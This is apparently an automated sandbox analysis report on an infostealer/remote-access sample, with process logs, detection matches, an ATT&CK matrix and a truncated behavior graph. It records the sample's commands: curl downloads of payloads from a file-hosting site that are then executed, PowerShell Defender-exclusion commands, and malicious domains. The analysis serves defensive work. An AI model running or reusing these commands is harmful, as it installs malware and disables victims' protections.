                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TkseHYIaPv.bat" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBDCC.tmp" "c:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP"
                                Source: C:\Edge\msedge.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CmSUPSwWTx.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AntDRUzUoe.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DFF654 cpuid 12_2_00DFF654
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_00007FF735DEB910
                                Source: C:\Windows\Speech\kdmapper.exeCode function: GetLocaleInfoW,GetNumberFormatW,12_2_00DFAF0F
                                Source: C:\Windows\Speech\physmeme.exeQueries volume information: C:\Windows\Speech\physmeme.exe VolumeInformationJump to behavior
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformationJump to behavior
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Idle.exeQueries volume information: C:\Users\user\AppData\Local\Idle.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Idle.exeQueries volume information: C:\Users\user\AppData\Local\Idle.exe VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Local\Idle.exeQueries volume information: C:\Users\user\AppData\Local\Idle.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Idle.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DEB78C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF735DEB78C
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DEB146 GetVersionExW,12_2_00DEB146
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: NCTSgL4t0B.exe, NCTSgL4t0B.exe, 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmp, NCTSgL4t0B.exe, 00000000.00000000.1230063015.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ollydbg.exe

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: 00000017.00000002.1537440310.00000000126C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 7576, type: MEMORYSTR
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: 23.0.msedge.exe.160000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66656cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66626cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66626cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66656cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000017.00000000.1467994457.0000000000162000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000003.1308955813.0000000006617000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000003.1309568242.0000000006614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Idle.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                Source: Yara matchFile source: 23.0.msedge.exe.160000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66656cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66626cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66626cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66656cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Idle.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: 00000017.00000002.1537440310.00000000126C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 7576, type: MEMORYSTR
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: 23.0.msedge.exe.160000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66656cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66626cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66626cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66656cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000017.00000000.1467994457.0000000000162000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000003.1308955813.0000000006617000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000003.1309568242.0000000006614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Idle.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                Source: Yara matchFile source: 23.0.msedge.exe.160000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66656cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66626cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66626cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.3.kdmapper.exe.66656cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Idle.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information11
                                Scripting
                                Valid Accounts11
                                Windows Management Instrumentation
                                11
                                Scripting
                                1
                                DLL Side-Loading
                                11
                                Disable or Modify Tools
                                11
                                Input Capture
                                1
                                System Time Discovery
                                1
                                Taint Shared Content
                                11
                                Archive Collected Data
                                1
                                Ingress Tool Transfer
                                Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts2
                                Native API
                                1
                                DLL Side-Loading
                                411
                                Process Injection
                                111
                                Deobfuscate/Decode Files or Information
                                LSASS Memory3
                                File and Directory Discovery
                                Remote Desktop Protocol1
                                Screen Capture
                                11
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution
                                21
                                Registry Run Keys / Startup Folder
                                21
                                Registry Run Keys / Startup Folder
                                4
                                Obfuscated Files or Information
                                Security Account Manager37
                                System Information Discovery
                                SMB/Windows Admin Shares11
                                Input Capture
                                3
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts3
                                Command and Scripting Interpreter
                                Login HookLogin Hook3
                                Software Packing
                                NTDS551
                                Security Software Discovery
                                Distributed Component Object Model3
                                Clipboard Data
                                114
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts1
                                PowerShell
                                Network Logon ScriptNetwork Logon Script1
                                DLL Side-Loading
                                LSA Secrets241
                                Virtualization/Sandbox Evasion
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                File Deletion
                                Cached Domain Credentials2
                                Process Discovery
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items132
                                Masquerading
                                DCSync1
                                Application Window Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
                                Virtualization/Sandbox Evasion
                                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt411
                                Process Injection
                                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522836 Sample: NCTSgL4t0B.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 144 zelensky.top 2->144 146 tiddymarktwo.shop 2->146 148 11 other IPs or domains 2->148 162 Suricata IDS alerts for network traffic 2->162 164 Found malware configuration 2->164 166 Antivirus detection for URL or domain 2->166 168 18 other signatures 2->168 14 NCTSgL4t0B.exe 2 2->14         started        17 Idle.exe 2->17         started        20 msedge.exe 2->20         started        22 3 other processes 2->22 signatures3 process4 file5 192 Tries to detect sandboxes and other dynamic analysis tools (window names) 14->192 194 Drops executables to the windows directory (C:\Windows) and starts them 14->194 196 Hides threads from debuggers 14->196 198 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 14->198 24 kdmapper.exe 3 6 14->24         started        28 physmeme.exe 2 14->28         started        30 cmd.exe 1 14->30         started        34 2 other processes 14->34 100 C:\Users\user\Desktop\pGvBroyE.log, PE32 17->100 dropped 102 C:\Users\user\Desktop\iZOTduyR.log, PE32 17->102 dropped 104 C:\Users\user\Desktop104ohnZlpE.log, PE32 17->104 dropped 112 3 other malicious files 17->112 dropped 32 cmd.exe 17->32         started        106 C:\Users\user\Desktop\tGwZoaKl.log, PE32 20->106 dropped 108 C:\Users\user\Desktop\sharmiXk.log, PE32 20->108 dropped 110 C:\Users\user\Desktop\iyHbCGSC.log, PE32 20->110 dropped 114 3 other malicious files 20->114 dropped 200 Antivirus detection for dropped file 22->200 202 Multi AV Scanner detection for dropped file 22->202 204 Machine Learning detection for dropped file 22->204 signatures6 process7 file8 132 C:dge\msedge.exe, PE32 24->132 dropped 134 C:dge\L6lFlVnd0szYUYb26bZc.vbe, data 24->134 dropped 182 Multi AV Scanner detection for dropped file 24->182 36 wscript.exe 1 24->36         started        184 Contains functionality to inject code into remote processes 28->184 186 Writes to foreign memory regions 28->186 188 Allocates memory in foreign processes 28->188 190 2 other signatures 28->190 39 RegAsm.exe 28->39         started        42 conhost.exe 28->42         started        44 curl.exe 2 30->44         started        47 conhost.exe 32->47         started        49 chcp.com 32->49         started        51 curl.exe 2 34->51         started        signatures9 process10 dnsIp11 170 Windows Scripting host queries suspicious COM object (likely to drop second stage) 36->170 172 Suspicious execution chain found 36->172 53 cmd.exe 1 36->53         started        150 offeviablwke.site 172.67.197.40, 443, 49706 CLOUDFLARENETUS United States 39->150 152 steamcommunity.com 104.102.49.254, 443, 49705 AKAMAI-ASUS United States 39->152 154 file.garden 188.114.96.3, 443, 49701, 49704 CLOUDFLARENETUS European Union 44->154 156 127.0.0.1 unknown unknown 44->156 136 C:\Windows\Speech\kdmapper.exe, PE32 44->136 dropped 138 C:\Windows\Speech\physmeme.exe, PE32 51->138 dropped file12 signatures13 process14 process15 55 msedge.exe 6 26 53->55         started        59 conhost.exe 53->59         started        file16 116 C:\Users\user\Desktop\onyQOgMn.log, PE32 55->116 dropped 118 C:\Users\user\Desktop\YlsMudWZ.log, PE32 55->118 dropped 120 C:\Users\user\Desktop\WjFdZuSe.log, PE32 55->120 dropped 122 5 other malicious files 55->122 dropped 174 Antivirus detection for dropped file 55->174 176 Multi AV Scanner detection for dropped file 55->176 178 Creates an undocumented autostart registry key 55->178 180 4 other signatures 55->180 61 cmd.exe 55->61         started        63 csc.exe 55->63         started        67 csc.exe 55->67         started        69 2 other processes 55->69 signatures17 process18 file19 71 msedge.exe 61->71         started        88 3 other processes 61->88 140 C:\Program Files (x86)\...\msedge.exe, PE32 63->140 dropped 158 Infects executable files (exe, dll, sys, html) 63->158 74 conhost.exe 63->74         started        76 cvtres.exe 63->76         started        142 C:\Windows\...\SecurityHealthSystray.exe, PE32 67->142 dropped 78 conhost.exe 67->78         started        80 cvtres.exe 67->80         started        160 Loading BitLocker PowerShell Module 69->160 82 conhost.exe 69->82         started        84 conhost.exe 69->84         started        86 WmiPrvSE.exe 69->86         started        signatures20 process21 file22 124 